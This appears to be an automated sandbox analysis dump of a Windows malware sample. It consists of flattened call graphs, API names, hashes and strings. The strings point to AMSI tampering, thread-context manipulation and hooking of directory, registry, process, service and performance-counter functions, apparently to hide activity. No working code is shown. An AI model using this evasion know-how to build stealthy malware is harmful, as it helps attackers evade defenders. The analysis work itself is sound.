253fc4018ac RegOpenKeyExW 14970->14974 14978 253fc401867 RegCloseKey 14972->14978 14975 253fc4012b8 16 API calls 14973->14975 14976 253fc4018e7 RegOpenKeyExW 14974->14976 14977 253fc4018d0 14974->14977 14979 253fc4018a2 RegCloseKey 14975->14979 14981 253fc40190b 14976->14981 14982 253fc401922 RegOpenKeyExW 14976->14982 14980 253fc4012b8 16 API calls 14977->14980 14978->14970 14979->14974 14983 253fc4018dd RegCloseKey 14980->14983 14984 253fc40104c 6 API calls 14981->14984 14985 253fc401946 14982->14985 14986 253fc40195d RegOpenKeyExW 14982->14986 14983->14976 14987 253fc401918 RegCloseKey 14984->14987 14988 253fc40104c 6 API calls 14985->14988 14989 253fc401998 RegCloseKey 14986->14989 14990 253fc401981 14986->14990 14987->14982 14992 253fc401953 RegCloseKey 14988->14992 14989->14961 14991 253fc40104c 6 API calls 14990->14991 14993 253fc40198e RegCloseKey 14991->14993 14992->14986 14993->14989 15038 253fc4014a0 14994->15038 15011->14945 15012->14947 15013->14949 15014->14951 15015->14953 15016->14955 15017->14957 15018->14959 15020 253fc401323 GetProcessHeap HeapAlloc 15019->15020 15021 253fc401486 RegCloseKey 15019->15021 15022 253fc40134e RegEnumValueW 15020->15022 15023 253fc401472 GetProcessHeap HeapFree 15020->15023 15021->14963 15024 253fc4013a1 15022->15024 15023->15021 15024->15022 15024->15023 15026 253fc40141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15024->15026 15027 253fc4013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15024->15027 15033 253fc401530 15024->15033 15026->15024 15027->15026 15029 253fc4011b5 RegCloseKey 15028->15029 15031 253fc4010bf 15028->15031 15029->14965 15030 253fc4010cf RegEnumValueW 15030->15031 15031->15029 15031->15030 15032 253fc40114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15031->15032 15032->15031 15034 253fc40154a 15033->15034 15037 253fc401580 15033->15037 15035 253fc401569 StrCmpW 15034->15035 15036 253fc401561 StrCmpIW 15034->15036 15034->15037 15035->15034 15036->15034 15037->15024 15039 253fc4014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15038->15039 15040 253fc4014c2 GetProcessHeap HeapFree 15038->15040 15040->15039 15040->15040 18382 253fc431bc4 18389 253fc431724 GetProcessHeap HeapAlloc 18382->18389 18384 253fc431bda Sleep 18385 253fc431724 50 API calls 18384->18385 18387 253fc431bd3 18385->18387 18387->18384 18388 253fc43159c StrCmpIW StrCmpW 18387->18388 18440 253fc4319b0 18387->18440 18388->18387 18457 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18389->18457 18391 253fc43174c 18458 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18391->18458 18393 253fc431754 18459 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18393->18459 18395 253fc43175d 18460 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18395->18460 18397 253fc431766 18461 253fc431264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18397->18461 18399 253fc43176f 18462 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18399->18462 18401 253fc431778 18463 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18401->18463 18403 253fc431781 18464 253fc431000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18403->18464 18405 253fc43178a RegOpenKeyExW 18406 253fc4317bc RegOpenKeyExW 18405->18406 18407 253fc4319a2 18405->18407 18408 253fc4317e5 18406->18408 18409 253fc4317fb RegOpenKeyExW 18406->18409 18407->18387 18465 253fc4312b8 RegQueryInfoKeyW 18408->18465 18411 253fc431836 RegOpenKeyExW 18409->18411 18412 253fc43181f 18409->18412 18415 253fc43185a 18411->18415 18416 253fc431871 RegOpenKeyExW 18411->18416 18474 253fc43104c RegQueryInfoKeyW 18412->18474 18420 253fc4312b8 16 API calls 18415->18420 18417 253fc431895 18416->18417 18418 253fc4318ac RegOpenKeyExW 18416->18418 18422 253fc4312b8 16 API calls 18417->18422 18423 253fc4318e7 RegOpenKeyExW 18418->18423 18424 253fc4318d0 18418->18424 18421 253fc431867 RegCloseKey 18420->18421 18421->18416 18425 253fc4318a2 RegCloseKey 18422->18425 18427 253fc43190b 18423->18427 18428 253fc431922 RegOpenKeyExW 18423->18428 18426 253fc4312b8 16 API calls 18424->18426 18425->18418 18429 253fc4318dd RegCloseKey 18426->18429 18430 253fc43104c 6 API calls 18427->18430 18431 253fc431946 18428->18431 18432 253fc43195d RegOpenKeyExW 18428->18432 18429->18423 18435 253fc431918 RegCloseKey 18430->18435 18436 253fc43104c 6 API calls 18431->18436 18433 253fc431998 RegCloseKey 18432->18433 18434 253fc431981 18432->18434 18433->18407 18438 253fc43104c 6 API calls 18434->18438 18435->18428 18437 253fc431953 RegCloseKey 18436->18437 18437->18432 18439 253fc43198e RegCloseKey 18438->18439 18439->18433 18479 253fc4314a0 18440->18479 18457->18391 18458->18393 18459->18395 18460->18397 18461->18399 18462->18401 18463->18403 18464->18405 18466 253fc431486 RegCloseKey 18465->18466 18467 253fc431323 GetProcessHeap HeapAlloc 18465->18467 18466->18409 18468 253fc43134e RegEnumValueW 18467->18468 18469 253fc431472 GetProcessHeap HeapFree 18467->18469 18470 253fc4313a1 18468->18470 18469->18466 18470->18468 18470->18469 18471 253fc431530 2 API calls 18470->18471 18472 253fc43141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 18470->18472 18473 253fc4313cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18470->18473 18471->18470 18472->18470 18473->18472 18475 253fc4311b5 RegCloseKey 18474->18475 18476 253fc4310bf 18474->18476 18475->18411 18476->18475 18477 253fc4310cf RegEnumValueW 18476->18477 18478 253fc43114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18476->18478 18477->18476 18478->18476 18480 253fc4314e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 18479->18480 18481 253fc4314c2 GetProcessHeap HeapFree 18479->18481 18481->18480 18481->18481 18482 253fc405fcc 18483 253fc405fd3 18482->18483 18484 253fc405f10 18483->18484 18485 253fc406000 VirtualProtect 18483->18485 18485->18484 18486 253fc406029 GetLastError 18485->18486 18486->18484 16802 253fc4119d0 16803 253fc40e864 56 API calls 16802->16803 16804 253fc4119d9 16803->16804 15877 253fc40b0d4 15884 253fc40b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 15877->15884 15878 253fc40b0fb 15879 253fc409324 _CreateFrameInfo 9 API calls 15878->15879 15880 253fc40b100 15879->15880 15881 253fc409324 _CreateFrameInfo 9 API calls 15880->15881 15883 253fc40b10b __FrameHandler3::GetHandlerSearchState 15880->15883 15881->15883 15882 253fc4099cc 9 API calls Is_bad_exception_allowed 15882->15884 15884->15878 15884->15882 15884->15883 15886 253fc4099f4 15884->15886 15887 253fc409324 _CreateFrameInfo 9 API calls 15886->15887 15888 253fc409a02 15887->15888 15888->15884 16809 253fc40c1d8 16810 253fc40c209 16809->16810 16811 253fc40c1f1 16809->16811 16811->16810 16812 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16811->16812 16812->16810 17732 253fc40f6dc 17733 253fc40f6e8 17732->17733 17735 253fc40f70f 17733->17735 17736 253fc411c0c 17733->17736 17737 253fc411c11 17736->17737 17741 253fc411c4c 17736->17741 17738 253fc411c44 17737->17738 17739 253fc411c32 DeleteCriticalSection 17737->17739 17740 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17738->17740 17739->17738 17739->17739 17740->17741 17741->17733 16813 253fc4025dc 16815 253fc40265a 16813->16815 16814 253fc402777 16815->16814 16816 253fc4026bf GetFileType 16815->16816 16817 253fc4026cd StrCpyW 16816->16817 16818 253fc4026e1 16816->16818 16822 253fc4026ee 16817->16822 16824 253fc401ad4 GetFinalPathNameByHandleW 16818->16824 16820 253fc403f88 StrCmpNIW 16820->16822 16822->16814 16822->16820 16829 253fc403708 StrCmpIW 16822->16829 16833 253fc401dd4 16822->16833 16825 253fc401b3d 16824->16825 16826 253fc401afe StrCmpNIW 16824->16826 16825->16822 16826->16825 16827 253fc401b18 lstrlenW 16826->16827 16827->16825 16828 253fc401b2a StrCpyW 16827->16828 16828->16825 16830 253fc40373a StrCpyW StrCatW 16829->16830 16831 253fc403751 PathCombineW 16829->16831 16832 253fc40375a 16830->16832 16831->16832 16832->16822 16834 253fc401deb 16833->16834 16835 253fc401df4 16833->16835 16836 253fc401530 2 API calls 16834->16836 16835->16822 16836->16835 17748 253fc4106e0 17749 253fc4106e9 17748->17749 17753 253fc4106f9 17748->17753 17750 253fc40d1f4 __std_exception_copy 13 API calls 17749->17750 17751 253fc4106ee 17750->17751 17752 253fc40d04c _invalid_parameter_noinfo 38 API calls 17751->17752 17752->17753 18492 253fc4063e3 18493 253fc4063f0 18492->18493 18494 253fc4063fc GetThreadContext 18493->18494 18499 253fc40655a 18493->18499 18495 253fc406422 18494->18495 18494->18499 18495->18499 18501 253fc406449 18495->18501 18496 253fc40663e 18498 253fc40665e 18496->18498 18503 253fc404b20 VirtualFree 18496->18503 18497 253fc406581 VirtualProtect FlushInstructionCache 18497->18499 18500 253fc405530 3 API calls 18498->18500 18499->18496 18499->18497 18507 253fc406663 18500->18507 18502 253fc4064cd 18501->18502 18504 253fc4064a6 SetThreadContext 18501->18504 18503->18498 18504->18502 18505 253fc4066b7 18508 253fc408070 _invalid_parameter_noinfo 8 API calls 18505->18508 18506 253fc406677 ResumeThread 18506->18507 18507->18505 18507->18506 18509 253fc4066ff 18508->18509 18510 253fc40f3e4 18511 253fc40f41d 18510->18511 18512 253fc40f3ee 18510->18512 18512->18511 18513 253fc40f403 FreeLibrary 18512->18513 18513->18512 18514 253fc4133e4 18515 253fc4133f5 CloseHandle 18514->18515 18516 253fc4133fb 18514->18516 18515->18516 18565 253fc4027e8 18566 253fc402867 18565->18566 18567 253fc4028c9 GetFileType 18566->18567 18579 253fc402998 18566->18579 18568 253fc4028d7 StrCpyW 18567->18568 18569 253fc4028ed 18567->18569 18570 253fc4028fc 18568->18570 18571 253fc401ad4 4 API calls 18569->18571 18572 253fc402906 18570->18572 18573 253fc40299d 18570->18573 18571->18570 18575 253fc403f88 StrCmpNIW 18572->18575 18578 253fc403708 4 API calls 18572->18578 18572->18579 18580 253fc401dd4 2 API calls 18572->18580 18574 253fc403f88 StrCmpNIW 18573->18574 18576 253fc403708 4 API calls 18573->18576 18577 253fc401dd4 2 API calls 18573->18577 18573->18579 18574->18573 18575->18572 18576->18573 18577->18573 18578->18572 18580->18572 18604 253fc40b7ea 18605 253fc40c2f4 14 API calls 18604->18605 18606 253fc40b7ef 18605->18606 18607 253fc40b815 GetModuleHandleW 18606->18607 18608 253fc40b85f 18606->18608 18607->18608 18612 253fc40b822 18607->18612 18621 253fc40b6f8 18608->18621 18612->18608 18616 253fc40b904 GetModuleHandleExW 18612->18616 18617 253fc40b938 GetProcAddress 18616->18617 18618 253fc40b94a 18616->18618 18617->18618 18619 253fc40b95b FreeLibrary 18618->18619 18620 253fc40b962 18618->18620 18619->18620 18620->18608 18633 253fc40c558 EnterCriticalSection 18621->18633 15901 253fc40acec 15904 253fc4090c0 15901->15904 15903 253fc40ad15 15905 253fc409116 15904->15905 15906 253fc4090e1 15904->15906 15905->15903 15906->15905 15908 253fc40c328 15906->15908 15909 253fc40c335 15908->15909 15910 253fc40c33f 15908->15910 15909->15910 15915 253fc40c35a 15909->15915 15911 253fc40d1f4 __std_exception_copy 13 API calls 15910->15911 15912 253fc40c346 15911->15912 15914 253fc40d04c _invalid_parameter_noinfo 38 API calls 15912->15914 15913 253fc40c352 15913->15905 15914->15913 15915->15913 15916 253fc40d1f4 __std_exception_copy 13 API calls 15915->15916 15916->15912 18634 253fc402ff0 18636 253fc403061 18634->18636 18635 253fc403384 18636->18635 18637 253fc40308d GetModuleHandleA 18636->18637 18638 253fc40309f GetProcAddress 18637->18638 18639 253fc4030b1 18637->18639 18638->18639 18639->18635 18640 253fc4030d8 StrCmpNIW 18639->18640 18640->18635 18646 253fc4030fd 18640->18646 18641 253fc401a30 6 API calls 18641->18646 18642 253fc4032b9 lstrlenW 18642->18646 18643 253fc40320f lstrlenW 18643->18646 18644 253fc401cfc StrCmpIW StrCmpW 18644->18646 18645 253fc403f88 StrCmpNIW 18645->18646 18646->18635 18646->18641 18646->18642 18646->18643 18646->18644 18646->18645 16861 253fc405974 16862 253fc40597a 16861->16862 16873 253fc407fa0 16862->16873 16866 253fc4059de 16867 253fc405a77 16867->16866 16870 253fc405bfd 16867->16870 16886 253fc407b80 16867->16886 16869 253fc405cfb 16870->16869 16871 253fc405d77 VirtualProtect 16870->16871 16871->16866 16872 253fc405da3 GetLastError 16871->16872 16872->16866 16876 253fc407fab 16873->16876 16874 253fc4059bd 16874->16866 16882 253fc404400 16874->16882 16875 253fc40b470 _invalid_parameter_noinfo 2 API calls 16875->16876 16876->16874 16876->16875 16877 253fc407fca 16876->16877 16878 253fc407fd5 16877->16878 16892 253fc4087b8 16877->16892 16896 253fc4087d8 16878->16896 16883 253fc40441d 16882->16883 16885 253fc40448c 16883->16885 16905 253fc404670 16883->16905 16885->16867 16887 253fc407bc7 16886->16887 16930 253fc407950 16887->16930 16890 253fc408070 _invalid_parameter_noinfo 8 API calls 16891 253fc407bf1 16890->16891 16891->16867 16893 253fc4087c6 std::bad_alloc::bad_alloc 16892->16893 16900 253fc409178 16893->16900 16895 253fc4087d7 16897 253fc4087e6 std::bad_alloc::bad_alloc 16896->16897 16898 253fc409178 Concurrency::cancel_current_task 2 API calls 16897->16898 16899 253fc407fdb 16898->16899 16903 253fc409197 16900->16903 16901 253fc4091c0 RtlPcToFileHeader 16904 253fc4091d8 16901->16904 16902 253fc4091e2 RaiseException 16902->16895 16903->16901 16903->16902 16904->16902 16906 253fc404694 16905->16906 16907 253fc4046b7 16905->16907 16906->16907 16919 253fc404120 16906->16919 16908 253fc4046ed 16907->16908 16925 253fc404250 16907->16925 16911 253fc404250 2 API calls 16908->16911 16912 253fc40471d 16908->16912 16911->16912 16914 253fc404120 3 API calls 16912->16914 16917 253fc404753 16912->16917 16913 253fc404120 3 API calls 16915 253fc40476f 16913->16915 16914->16917 16916 253fc404250 2 API calls 16915->16916 16918 253fc40478b 16915->16918 16916->16918 16917->16913 16917->16915 16918->16885 16920 253fc404141 16919->16920 16921 253fc404196 VirtualQuery 16920->16921 16922 253fc4041ca VirtualAlloc 16920->16922 16924 253fc4041b0 16920->16924 16921->16920 16921->16924 16923 253fc4041fb GetLastError 16922->16923 16922->16924 16923->16920 16923->16924 16924->16907 16928 253fc404268 16925->16928 16926 253fc4042d7 16926->16908 16927 253fc4042bd VirtualQuery 16927->16926 16927->16928 16928->16926 16928->16927 16929 253fc404322 GetLastError 16928->16929 16929->16926 16929->16928 16931 253fc40796b 16930->16931 16932 253fc40798f 16931->16932 16933 253fc407981 SetLastError 16931->16933 16932->16890 16933->16932 15933 253fc41387c 15934 253fc4138b4 __GSHandlerCheckCommon 15933->15934 15935 253fc4138e0 15934->15935 15937 253fc409a24 15934->15937 15938 253fc409324 _CreateFrameInfo 9 API calls 15937->15938 15939 253fc409a4e 15938->15939 15940 253fc409324 _CreateFrameInfo 9 API calls 15939->15940 15941 253fc409a5b 15940->15941 15942 253fc409324 _CreateFrameInfo 9 API calls 15941->15942 15943 253fc409a64 15942->15943 15943->15935 17025 253fc40c180 17028 253fc40bf38 17025->17028 17035 253fc40bf00 17028->17035 17033 253fc40bebc 13 API calls 17034 253fc40bf6b 17033->17034 17036 253fc40bf15 17035->17036 17037 253fc40bf10 17035->17037 17039 253fc40bf1c 17036->17039 17038 253fc40bebc 13 API calls 17037->17038 17038->17036 17040 253fc40bf2c 17039->17040 17041 253fc40bf31 17039->17041 17042 253fc40bebc 13 API calls 17040->17042 17041->17033 17042->17041 15977 253fc405c8d 15979 253fc405c94 15977->15979 15978 253fc405cfb 15979->15978 15980 253fc405d77 VirtualProtect 15979->15980 15981 253fc405da3 GetLastError 15980->15981 15982 253fc405db1 15980->15982 15981->15982 18669 253fc411398 18670 253fc4113ae 18669->18670 18671 253fc4113f5 18670->18671 18673 253fc41140e 18670->18673 18672 253fc40d1f4 __std_exception_copy 13 API calls 18671->18672 18674 253fc4113fa 18672->18674 18676 253fc40dd78 14 API calls 18673->18676 18677 253fc411405 18673->18677 18675 253fc40d04c _invalid_parameter_noinfo 38 API calls 18674->18675 18675->18677 18676->18677 18678 253fc41479d 18681 253fc40af34 18678->18681 18682 253fc40af4e 18681->18682 18684 253fc40af9b 18681->18684 18683 253fc409324 _CreateFrameInfo 9 API calls 18682->18683 18682->18684 18683->18684 15056 253fc40f6a0 15067 253fc40c558 EnterCriticalSection 15056->15067 15058 253fc40f6b0 15059 253fc411c5c 39 API calls 15058->15059 15060 253fc40f6b9 15059->15060 15061 253fc40f6c7 15060->15061 15062 253fc40f498 41 API calls 15060->15062 15063 253fc40c5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15061->15063 15064 253fc40f6c2 15062->15064 15065 253fc40f6d3 15063->15065 15066 253fc40f598 GetStdHandle GetFileType 15064->15066 15066->15061 18696 253fc410fa8 18697 253fc410fcc 18696->18697 18698 253fc408070 _invalid_parameter_noinfo 8 API calls 18697->18698 18699 253fc41100e 18698->18699 18700 253fc4033a8 18702 253fc4033cf 18700->18702 18701 253fc40349c 18702->18701 18703 253fc4033ec PdhGetCounterInfoW 18702->18703 18703->18701 18704 253fc40340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 18703->18704 18705 253fc403488 GetProcessHeap HeapFree 18704->18705 18706 253fc403440 StrCmpW 18704->18706 18705->18701 18706->18705 18708 253fc403455 18706->18708 18707 253fc403950 12 API calls 18707->18708 18708->18705 18708->18707 17786 253fc40aaac 17787 253fc40aad9 __except_validate_context_record 17786->17787 17788 253fc409324 _CreateFrameInfo 9 API calls 17787->17788 17789 253fc40aade 17788->17789 17792 253fc40ab38 17789->17792 17793 253fc40abc6 17789->17793 17800 253fc40ab8c 17789->17800 17790 253fc40ac34 17790->17800 17828 253fc40a22c 17790->17828 17791 253fc40abb3 17815 253fc4095d0 17791->17815 17792->17791 17792->17800 17801 253fc40ab5a __GetCurrentState 17792->17801 17797 253fc40abe5 17793->17797 17822 253fc4099cc 17793->17822 17797->17790 17797->17800 17825 253fc4099e0 17797->17825 17798 253fc40acdd 17801->17798 17803 253fc40afb8 17801->17803 17804 253fc4099cc Is_bad_exception_allowed 9 API calls 17803->17804 17805 253fc40afe7 __GetCurrentState 17804->17805 17806 253fc409324 _CreateFrameInfo 9 API calls 17805->17806 17813 253fc40b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17806->17813 17807 253fc40b0fb 17808 253fc409324 _CreateFrameInfo 9 API calls 17807->17808 17809 253fc40b100 17808->17809 17810 253fc409324 _CreateFrameInfo 9 API calls 17809->17810 17811 253fc40b10b __FrameHandler3::GetHandlerSearchState 17809->17811 17810->17811 17811->17800 17812 253fc4099cc 9 API calls Is_bad_exception_allowed 17812->17813 17813->17807 17813->17811 17813->17812 17814 253fc4099f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17813->17814 17814->17813 17885 253fc409634 17815->17885 17817 253fc4095ef __FrameHandler3::ExecutionInCatch 17889 253fc409540 17817->17889 17820 253fc40afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17821 253fc409624 17820->17821 17821->17800 17823 253fc409324 _CreateFrameInfo 9 API calls 17822->17823 17824 253fc4099d5 17823->17824 17824->17797 17826 253fc409324 _CreateFrameInfo 9 API calls 17825->17826 17827 253fc4099e9 17826->17827 17827->17790 17893 253fc40b144 17828->17893 17830 253fc40a6f4 17831 253fc40a645 17831->17830 17871 253fc40a643 17831->17871 17946 253fc40a6fc 17831->17946 17832 253fc40a373 17832->17831 17833 253fc40a3ab 17832->17833 17836 253fc40a575 17833->17836 17868 253fc4099e0 9 API calls 17833->17868 17918 253fc40a96c 17833->17918 17932 253fc40a158 17833->17932 17835 253fc409324 _CreateFrameInfo 9 API calls 17839 253fc40a687 17835->17839 17841 253fc40a592 17836->17841 17843 253fc4099cc Is_bad_exception_allowed 9 API calls 17836->17843 17836->17871 17837 253fc409324 _CreateFrameInfo 9 API calls 17840 253fc40a2da 17837->17840 17839->17830 17842 253fc408070 _invalid_parameter_noinfo 8 API calls 17839->17842 17840->17839 17844 253fc409324 _CreateFrameInfo 9 API calls 17840->17844 17848 253fc40a5b4 17841->17848 17841->17871 17939 253fc4095a4 17841->17939 17845 253fc40a69a 17842->17845 17843->17841 17847 253fc40a2ea 17844->17847 17845->17800 17849 253fc409324 _CreateFrameInfo 9 API calls 17847->17849 17851 253fc40a5ca 17848->17851 17848->17871 17882 253fc40a6d7 17848->17882 17850 253fc40a2f3 17849->17850 17904 253fc409a0c 17850->17904 17852 253fc40a5d5 17851->17852 17855 253fc4099cc Is_bad_exception_allowed 9 API calls 17851->17855 17859 253fc40b1dc 9 API calls 17852->17859 17853 253fc409324 _CreateFrameInfo 9 API calls 17856 253fc40a6dd 17853->17856 17855->17852 17858 253fc409324 _CreateFrameInfo 9 API calls 17856->17858 17862 253fc40a6e6 17858->17862 17860 253fc40a5eb 17859->17860 17865 253fc409634 __GetUnwindTryBlock RtlLookupFunctionEntry 17860->17865 17860->17871 17861 253fc409324 _CreateFrameInfo 9 API calls 17863 253fc40a335 17861->17863 17864 253fc40c2f4 14 API calls 17862->17864 17863->17832 17867 253fc409324 _CreateFrameInfo 9 API calls 17863->17867 17864->17830 17866 253fc40a605 17865->17866 17943 253fc409838 RtlUnwindEx 17866->17943 17870 253fc40a341 17867->17870 17868->17833 17872 253fc409324 _CreateFrameInfo 9 API calls 17870->17872 17871->17835 17874 253fc40a34a 17872->17874 17907 253fc40b1dc 17874->17907 17878 253fc40a35e 17914 253fc40b2cc 17878->17914 17880 253fc40a6d1 17881 253fc40c2f4 14 API calls 17880->17881 17881->17882 17882->17853 17883 253fc40a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17883->17880 17884 253fc409178 Concurrency::cancel_current_task 2 API calls 17883->17884 17884->17880 17886 253fc409662 __FrameHandler3::ExecutionInCatch 17885->17886 17887 253fc40968c RtlLookupFunctionEntry 17886->17887 17888 253fc4096d4 17886->17888 17887->17886 17888->17817 17890 253fc40958b 17889->17890 17891 253fc409560 17889->17891 17890->17820 17891->17890 17892 253fc409324 _CreateFrameInfo 9 API calls 17891->17892 17892->17891 17894 253fc40b169 __FrameHandler3::ExecutionInCatch 17893->17894 17895 253fc409634 __GetUnwindTryBlock RtlLookupFunctionEntry 17894->17895 17896 253fc40b17e 17895->17896 17958 253fc409db4 17896->17958 17899 253fc40b1b3 17901 253fc409db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17899->17901 17900 253fc40b190 __FrameHandler3::GetHandlerSearchState 17961 253fc409dec 17900->17961 17902 253fc40a28e 17901->17902 17902->17830 17902->17832 17902->17837 17905 253fc409324 _CreateFrameInfo 9 API calls 17904->17905 17906 253fc409a1a 17905->17906 17906->17830 17906->17861 17909 253fc40b2c3 17907->17909 17913 253fc40b207 17907->17913 17908 253fc40a35a 17908->17832 17908->17878 17910 253fc4099e0 9 API calls 17910->17913 17911 253fc4099cc Is_bad_exception_allowed 9 API calls 17911->17913 17912 253fc40a96c 9 API calls 17912->17913 17913->17908 17913->17910 17913->17911 17913->17912 17916 253fc40b2e9 Is_bad_exception_allowed 17914->17916 17917 253fc40b339 17914->17917 17915 253fc4099cc 9 API calls Is_bad_exception_allowed 17915->17916 17916->17915 17916->17917 17917->17883 17919 253fc40a999 17918->17919 17931 253fc40aa28 17918->17931 17920 253fc4099cc Is_bad_exception_allowed 9 API calls 17919->17920 17921 253fc40a9a2 17920->17921 17922 253fc4099cc Is_bad_exception_allowed 9 API calls 17921->17922 17923 253fc40a9bb 17921->17923 17921->17931 17922->17923 17924 253fc40a9e7 17923->17924 17925 253fc4099cc Is_bad_exception_allowed 9 API calls 17923->17925 17923->17931 17926 253fc4099e0 9 API calls 17924->17926 17925->17924 17927 253fc40a9fb 17926->17927 17928 253fc40aa14 17927->17928 17929 253fc4099cc Is_bad_exception_allowed 9 API calls 17927->17929 17927->17931 17930 253fc4099e0 9 API calls 17928->17930 17929->17928 17930->17931 17931->17833 17933 253fc409634 __GetUnwindTryBlock RtlLookupFunctionEntry 17932->17933 17934 253fc40a195 17933->17934 17935 253fc4099cc Is_bad_exception_allowed 9 API calls 17934->17935 17936 253fc40a1cd 17935->17936 17937 253fc409838 9 API calls 17936->17937 17938 253fc40a211 17937->17938 17938->17833 17940 253fc4095b8 __FrameHandler3::ExecutionInCatch 17939->17940 17941 253fc409540 __FrameHandler3::ExecutionInCatch 9 API calls 17940->17941 17942 253fc4095c2 17941->17942 17942->17848 17944 253fc408070 _invalid_parameter_noinfo 8 API calls 17943->17944 17945 253fc409932 17944->17945 17945->17871 17947 253fc40a735 17946->17947 17951 253fc40a948 17946->17951 17948 253fc409324 _CreateFrameInfo 9 API calls 17947->17948 17949 253fc40a73a 17948->17949 17950 253fc40a759 EncodePointer 17949->17950 17953 253fc40a7ac 17949->17953 17952 253fc409324 _CreateFrameInfo 9 API calls 17950->17952 17951->17871 17954 253fc40a769 17952->17954 17953->17951 17956 253fc4099cc 9 API calls Is_bad_exception_allowed 17953->17956 17957 253fc40a158 19 API calls 17953->17957 17954->17953 17964 253fc4094ec 17954->17964 17956->17953 17957->17953 17959 253fc409634 __GetUnwindTryBlock RtlLookupFunctionEntry 17958->17959 17960 253fc409dc7 17959->17960 17960->17899 17960->17900 17962 253fc409634 __GetUnwindTryBlock RtlLookupFunctionEntry 17961->17962 17963 253fc409e06 17962->17963 17963->17902 17965 253fc409324 _CreateFrameInfo 9 API calls 17964->17965 17966 253fc409518 17965->17966 17966->17953

                                            Executed Functions

                                            Function 00000253FC401E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 532c2657adfb75e6c0280d5284af03685f5cb43d16fbdfb69c32e6aee7c8344c
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: 87D01230ED9D08C5E90BEB16EC5C35422616B54BC3FD02014C14E01A70EE3C4B788748
                                            Function 00000253FC401E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: c667fe879837e9b6c370277d5f3ffd56394cf4864c0bd450d85018cb482f4e7e
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: BF51B074DD8E0EA5EA13DFAAEC4D7D42B20A7403D6F802417944952DB1EE3C8B7AC748
                                            Function 00000253FC403A1C Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
